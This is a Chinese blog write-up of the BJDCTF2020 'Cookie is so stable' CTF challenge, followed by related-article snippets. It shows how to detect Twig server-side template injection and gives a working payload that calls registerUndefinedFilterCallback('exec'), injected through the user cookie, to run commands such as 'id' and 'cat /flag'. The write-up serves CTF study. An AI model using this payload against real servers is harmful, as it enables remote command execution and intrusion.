2020/7/19 - [BJDCTF2020]Cookie is so stable - twg服务器端模板注入

最新推荐文章于 2024-08-04 11:54:55 发布
最新推荐文章于 2024-08-04 11:54:55 发布
阅读量383 收藏 1
点赞数
分类专栏: CTF 文章标签: ssti twg buuoj之web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangxiansheng12/article/details/107453879
版权

这是道服务器端模板注入,过段时间总结一下各种payload到一篇文章里。
测试ssti漏洞的payload为

{{7*'7'}}

如果返回的是49就是twg注入,7777777是jinja2(这个我还没实验,摘自他人文章)
在这里插入图片描述
在这里插入图片描述
返回的是49,说明是twg模板,下面是固定的测试twg注入的payload,
一篇文章带你理解漏洞之 SSTI 漏洞

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

回调exec实现命令执行,下面是测试:
利用提示的cookie,改cookie实现注入。
在这里插入图片描述

在这里插入图片描述
注入成功,将命令改为cat /flag即可查看flag文件,payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

在这里插入图片描述

抒情诗、
关注
专栏目录
【学习笔记 42】 buu [BJDCTF2020]Cookie is so stable
weixin_43553654的博客
08-02 361
0x00 知识点 Twig模板注入 0x01 知识点详解 什么是Twig模板注入? 答:这里推荐一位大佬的文章,看看人家的博客,才是真的强。 https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞SSTI漏洞/#2-Twig 0x02 解题思路 什么都没有,点开flag 发现是个登录界面,尝试经典{{7*7}}后判断是Twig模板注入 再hint页面查看源码 发现提示指向了cookie,再flag页面登录的时候抓包分析。 推测出cookie里的user参数就是
mobp-twg-ios-test-danny
04-16
Warehouse iOS测试 此Repo是测试应用程序的起点。 您需要实现面试过程中获得的摘要中指定的一些新功能。 这不仅仅是功能。 我们想看看您对代码有什么控制权,如何表示系统和逻辑,以及完成得如何优雅。...
[BJDCTF2020]Cookie is so stable
Sk1y的博客
04-05 1806
考查的地方:模板注入,利用Twig模板本身的特性进行攻击
[BJDCTF2020]Cookie is so stable1
最新发布
kw741951的博客
08-04 229
尝试{{7*7}},发现ssti漏洞,判断是twig。提示看cookie,burp抓包查看cookie。抓包,发现user为注入点。点击hint查看源码。
CSM doc List--TWG.docx
09-20
文档"CSM doc List--TWG.docx"是关于一个项目或系统开发过程中的关键文档列表,主要关注安全管理和风险管理。以下是对各个知识点的详细解释: 1. 初步系统定义:这是项目启动阶段的一项工作,它明确了系统的基本...
SFF-8643.PDF
04-13
SFF-8643是针对Mini Multilane 4/8X 12 Gb/s Unshielded Connector(HD12un)的一种接口规范,它由存储网络行业协会(SNIA)的SFF(Small Form Factor)技术附属(TA)工作组(TWG)开发。这个标准最初是由SFF委员会...
SFF-8643硬盘连接器标准规范
03-23
SFF-8643硬盘连接器标准规范是存储网络行业协会(Storage Networking Industry Association,简称SNIA)下的技术 Affiliate(技术附属机构)技术工作组(Technical Working Group,简称TWG)所制定的规范。...
SFF-8613硬盘连接器标准规范
03-23
SFF-8613规范的制定和发布是由SNIA的技术工作组(TWG)负责的,TWG是一个非营利性的技术组织,旨在推动存储网络工业的发展。SNIA是存储网络工业的领导者,旨在推动存储技术的发展和应用。 在制定SFF-8613规范的过程...
web buuctf [BJDCTF2020]Cookie is so stable
weixin_44214568的博客
03-31 551
1. 2.查看hint页面源代码,提示关键在cookie 3.用admin登录,之后刷新抓包,发现cookie: UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin 第一个是友盟的,主要看cookie中的user 4.cookie中的注入,我第一个想法就是ssti模板注入) paylo
BUUCTF-web类-[BJDCTF2020]Cookie is so stable
weixin_44622228的博客
04-20 894
BUUCTF-web类-[BJDCTF2020]Cookie is so stable 题目提示Cookie,进入靶机就看看cookie, 目前看来没有什么异常,先看看页面,发现有flag按钮,查看一下 要我们输入一个id,随便输入个123看看, 回显我们的id,于是看了看我的cookie,发现Cookie中多了user参数。 初步猜想,有没有可能是Cookie注入?于是我输入了几个注入关键字测试...
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 799
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
[BJDCTF2020]Cookie is so stable漏洞原理详解)
pakho_C的博客
04-18 3319
web第45题 [BJDCTF2020]Cookie is so stable 打开靶场 访问flag页面 一个输入框 访问hint页面,查看源码 提示与cookie有关 那么在flag页面输入后抓包观察 输入后显示 登陆后抓包显示为 做到这里又遇到新的知识点了,模板注入漏洞 参考大佬的博客:一篇文章带你理解漏洞SSTI 漏洞,讲的非常详细 漏洞原理: SSTI 怎么产生的 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 2772
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
SFF-8410:高性能SCOPP测试与性能规范
SFF-8410.PDF 是由 SFF(Small Form Factor)委员会制定的一个标准,该委员会后来成为了SNIA(Storage Networking Industry Association)的SFF Technology Affiliate(TA)技术工作小组(TWG)。这个标准是在SNIA的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抒情诗、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值